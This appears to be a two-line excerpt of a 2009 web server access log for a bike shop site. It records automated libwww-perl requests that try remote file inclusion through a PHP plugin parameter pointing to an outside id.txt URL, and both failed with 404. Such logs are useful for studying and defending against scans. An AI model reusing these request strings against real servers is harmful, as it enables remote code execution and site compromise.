195.70.36.41 - - [13/Jul/2009:18:51:45 -0700] "GET /logs/access.log//standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.die-grenzreiter.com/content/download/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "houstonbikeshop.com"
195.70.36.41 - - [13/Jul/2009:18:51:45 -0700] "GET /standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.die-grenzreiter.com/content/download/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "houstonbikeshop.com"
